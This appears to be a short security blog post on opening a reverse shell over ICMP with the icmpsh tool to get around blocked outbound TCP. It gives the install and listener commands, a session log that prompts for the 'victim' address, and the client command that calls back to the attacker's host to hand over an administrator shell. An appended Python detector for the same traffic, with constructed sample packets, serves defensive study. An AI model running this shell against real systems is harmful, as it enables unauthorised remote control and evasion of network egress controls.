Reverse shell over the ICMP protocol

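Tool: https://github.com/inquisb/icmpsh#usage
In environments with strict access control, TCP traffic from the inside to the outside is blocked. This article covers the use of the ICMP shell.
Features:
1) Open-source program
2) Client/server architecture
3) The server side is cross-platform, with C, Perl, and Python versions
4) The client supports Windows only
5) Administrator privileges are not required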

The server side first needs the Python package installed

[root@server120 icmpsh-master]# pip install Impacket
[root@server120 icmpsh-master]# ./run.sh
##################################################################

ICMP Shell Automation Script for

https://github.com/inquisb/icmpsh

##################################################################

-------------------------------------------------------------------
[?] What is the victims public IP address?
-------------------------------------------------------------------
192.168.192.122

[-] Run the following code on your victim system on the listender has started:

++++++++++++++++++++++++++++++++++++++++++++++++++

icmpsh.exe -t 192.168.192.120 -d 500 -b 30 -s 128

++++++++++++++++++++++++++++++++++++++++++++++++++
[-] Local ICMP Replies are currently enabled, I will disable these temporarily now

[-] Launching Listener...,waiting for a inbound connection..
D:\>whoami
whoami
win-a94sbnf0i6b\administrator

 

Client:
icmpsh.exe -t 192.168.192.120 -d 500 -b 30 -s 128
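
Detection side of the session above, as an added example that is not part of the original post or the icmpsh project: a Python check that flags source/destination pairs whose ICMP echo requests arrive at a steady sub-second interval (the client above uses -d 500, a 500 ms delay) while the payload keeps changing. The record format, the thresholds, the host 192.168.192.50 and the heuristic itself are assumptions, and the sample packets are constructed.

```python
import struct
from collections import defaultdict
from statistics import median

def parse_echo_request(icmp: bytes):
    """Return the payload of an ICMP echo request (type 8, code 0), else None."""
    if len(icmp) < 8:
        return None
    icmp_type, code, _cksum, _ident, _seq = struct.unpack("!BBHHH", icmp[:8])
    return icmp[8:] if (icmp_type, code) == (8, 0) else None

def suspicious_flows(records, min_packets=5, max_interval=1.0):
    """records: iterable of (timestamp_s, src, dst, icmp_bytes).
    Flags flows whose echo requests keep a steady short interval while the
    payload size or content changes (a heuristic, assumed for this example)."""
    flows = defaultdict(list)
    for ts, src, dst, icmp in records:
        payload = parse_echo_request(icmp)
        if payload is not None:
            flows[(src, dst)].append((ts, payload))
    hits = []
    for key, pkts in flows.items():
        if len(pkts) < min_packets:
            continue
        pkts.sort(key=lambda p: p[0])
        gaps = [b[0] - a[0] for a, b in zip(pkts, pkts[1:])]
        sizes = {len(p) for _, p in pkts}
        # Ignore the first 16 bytes: Unix ping keeps a timestamp at the start.
        tails = {p[16:] for _, p in pkts}
        if median(gaps) <= max_interval and (len(sizes) > 1 or len(tails) > 1):
            hits.append(key)
    return hits

def _echo(payload: bytes, seq: int, icmp_type: int = 8) -> bytes:
    # Constructed sample packet; checksum left at 0 because it is not checked here.
    return struct.pack("!BBHHH", icmp_type, 0, 0, 1, seq) + payload

# Constructed traffic: .122 sends changing payloads every 0.5 s; .50 is a
# hypothetical host running an ordinary Windows ping with its fixed 32-byte pattern.
WINDOWS_PING = b"abcdefghijklmnopqrstuvwabcdefghi"
OUTPUTS = [b"", b"D:\\>", b"whoami\r\n", b"win-a94sbnf0i6b\\administrator\r\n", b"", b"D:\\>"]
SAMPLE = []
for i, data in enumerate(OUTPUTS):
    SAMPLE.append((i * 0.5, "192.168.192.122", "192.168.192.120", _echo(data, i)))
    SAMPLE.append((i * 1.0, "192.168.192.50", "192.168.192.120", _echo(WINDOWS_PING, i)))

if __name__ == "__main__":
    print(suspicious_flows(SAMPLE))
```

On real captures the thresholds need tuning against the monitoring and diagnostic tools that legitimately ping from the same network.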